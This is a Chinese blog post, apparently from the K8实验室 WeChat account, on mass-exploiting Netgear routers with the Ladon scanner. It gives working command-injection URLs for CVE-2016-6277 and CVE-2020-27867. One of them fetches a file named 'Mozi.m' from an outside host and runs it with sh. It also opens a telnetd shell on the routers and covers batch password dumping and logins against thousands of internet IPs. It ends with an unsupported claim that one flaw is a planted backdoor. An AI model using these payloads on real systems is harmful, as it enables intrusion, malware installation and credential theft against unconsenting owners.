,
NETGEAR是美国网件公司的路由器。
美国网件公司简介:NETGEAR美国网件,为全球商用企业用户和家庭个人用户提供创新的产品、优质的智能家庭无线解决方案。始终以提升用户体验为己任,采用业界前沿技术,凭借独特工业设计和专利无线技术,以其稳定性高、速度快、性能彪悍,屡获德国红点设计大奖、美国CES科技创新奖、欧洲电脑协会(EHA)奖。NETGEAR 推出全球首款基于802.11n无线协议标准的产品,以三层千兆以太网交换机刷新了全世界最智能的三层千兆交换机性能表现。
WhatCMS指纹别网络设备 路由器
Ladon48 ip/24 WhatCMS 扫描C段常见Web端口资产并识别CMSLadon48 ip/c WhatCMS 扫描C段Ladon48 ip/b WhatCMS 扫描B段Ladon48 ip/a WhatCMS 扫描A段Ladon48 url.txt WhatCMS 批量urlLadon48 ip24.txt WhatCMS 多个C段放在txt里Ladon48 ip16.txt WhatCMS 多个B段放在txt里
不管我们正在做内网渗透还是外网渗透,对于非域或没有0day一键拿权限的情况下,资产探测并识别指纹是非常重要的,知道目标使用什么设备才能定制POC,知道目标使用什么CMS才能针对性查找POC或定制相应工具,对于Web资产,提交参数为IP时(包含C段、B段、A段等),WhatCMS模块将自动探测常见Web端口资产,同时识别CMS,为后续渗透提供基础。如本文假设探测到netgear路由器
一、Netgear R7000 RCE cve-2016-6277
虽然漏洞很旧,快7年了,但硬件这种东西,很多人不会去升级,特别是家用的,换个角度,做安全的家里的路由器都不一定更新固件,不懂技术的普通人怎么可能更新,除非路由器自带更新功能,近几年的型号可能有,但是早期的多数不含自动更新固件功能,所以没有专人维护的设备,就是突破口。
url: http://:8443/cgi-bin/;cd${IFS}/var/tmp;rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://k8gege.org:800/Mozi.m;${IFS}sh${IFS}/var/tmp/Mozi.m
因为是无回显漏洞,所以我们需要在VPS上启动Ladon web 800命令监听,用于捕获存在漏洞的IP,旧版Ladon需重定向输出到txt才能获取漏洞结果。最新版10.6.1自动保存提交ISVUL或POCTEST字符串的IP到isvul.txt中。
使用LadonExp可一键生成POC,快速扩展Ladon的批量扫描能力
/cgi-bin/;wget${IFS}http://You_VPS_IP:800/ISVUL;
点击Build DLL生成poc.dll,点击Test DLL,自动调用Ladon测试POC是否可用
目标存在漏洞,将会执行wget命令访问Ladon的web服务器,可以看到,存在漏洞的路由器Wget版本基本为 Wget/1.17.1 (Linux-gnu)。高亮黄色为目标IP,最新版存在漏洞将显示高亮紫色,且自动保存漏洞IP。
单个URL测试成功后,可使用以下命令,批量检测存在漏洞路由器
Ladon48 url.txt LadonPoc48.dll
开启Telnet Shell
按照以上操作,我们也可以批量获取路由器Telnet权限,Poc如下
http://RouterIP/;telnetd$IFS-p$IFS'888'二、CVE-2020-27867 RCE
http://192.168.1.1/setup.cgi?todo=funjsq_login&next_file=basic_wait.htm&funjsq_access_token=|ping%20-c5%20k8gege.org大家参考第一个漏洞,自行复现此漏洞,加深印象
三、NetGear路由器密码读取
github上的一个py脚本,通过INI配置,也可以快速扩展Ladon扫描能力
poc.ini
[Ladon]exe=python.exearg=longue-vue.py --target $ip$ --dump-pwd
批量检测
Ladon url.txt poc.ini测试几千个IP,发现仅得到几十个结果,这和文章第一个漏洞所说,很多人不更新有点不符啊。于是使用Firefox和Chrome访问,很多都访问不到,特别是有一些是Ladon密码审计出来的也识别出了版本,显然目标是可以访问的。原来tls版本的原因,看来PY脚本可能也是这问题
使用IE成功访问,这和Ladon探测或401密码审计弱口令一致
使用LadonEXP测试,可访问到该路由器,完美回显html源码
于是提取PY里的核心POC,通过LadonEXP发包,发现回显中返回密码。为什么这么做,因为改别人的代码,还不如自己写,加上有现成的,只需配置就可以生成,为什么用Python这种SB缩进让人蛋疼的语言,加上Ladon调用外部非.net程序,无法完美兼容。
使用正则提取密码
Ladon模块NetGearPwd NetGear路由器密码读取
##### 194 NetGearPwd NetGear DGND3700v2路由器密码读取Ladon https://192.168.1.8 NetGearPwdLadon url.txt NetGearPwd 批量NetGear漏洞导出用户密码
果然同样的Payload改用Ladon来提交,得到了几千结果。测试发现,使用读取出来的密码,也有登陆不了的,和之前发的401密码审计NetGear路由器得出的密码一样,最初以为是误报,现在猜测可能是类似RouterOS路由器,做了IP限制等原因导致有正确密码也无法登陆。问我怎么办?试其它可以登陆的啊,不是一堆存在漏洞吗。
四、NetGear密码审计
该路由器默认密码admin 1234等,可参考10.5发的文章
五、小结
实战同一个漏洞甚至同一个POC,可以尝试不同工具提交,可能会有不同结果。就像本文github上找的py脚本,若是单纯拿它来打,可能就真的以为只有几十个IP有洞了,有超时的原因,也有SSL版本的原因,但大部份POC只是POC,只是用来单纯证明存在漏洞。可能测试时只针对HTTP,没有针对HTTPS,即使针对HTTPS,1.0 1.1 1.2 1.3等也有很多区别。在过往文章中我也多次提到针对URL的,优先使用Ladon48,因为它可兼容多个SSL版本。其它语言也是同理,除非作者处理了所有, 要不然就会导致错过很多本就存在漏洞的站点。tls 1.2不只是在这款路由,在其它路由我也遇到了,还有某些Excahnge或其它站点,基本上遇到1.2和1.3的网上很多POC可能会失效。所以实战中可能需要使用不同工具,Ladon不同版本针对SSL也有很大区别。
本文中的一个RCE,在漂亮一个都扫不到,很明显这不是漏洞,而是人为后门。显而易见,硬件供应链攻击在多国中,早已存在多年,特别是上次黑帽大会提到的Cisco供应链攻击,研究人员在PDF明确提到修改思科再出售,后续可通过该型号思科横向获取管理员权限。我怀疑这个研究人员发现可以修改固件,实际上可能也是别人故意留的后门之一,只是没有那么明显,因为留后门人的能力也分三六九等,渗透也分三六九等,任何技术都一样,有人留后门一言就看出是后门,或者容易被人挖到然后公开所谓的RCE漏洞,又或者公开了被轻易利用,但是牛B的难度大的,即便公开了也有漏洞细节了,全球都没几个人能复现。当然也有可能那个真的是研发人员安全意识不够,不懂安全导致的,因为对于不懂渗透的,研发的东西确实不考虑安全,并不知危害。现实中99.999%的漏洞是真的漏洞,剩下的所谓漏洞,肯定是人为留下的,实是被人发现了不能承认是后门,只能修补。
原文始发于微信公众号(K8实验室):NetGear路由器 多个RCE漏洞复现
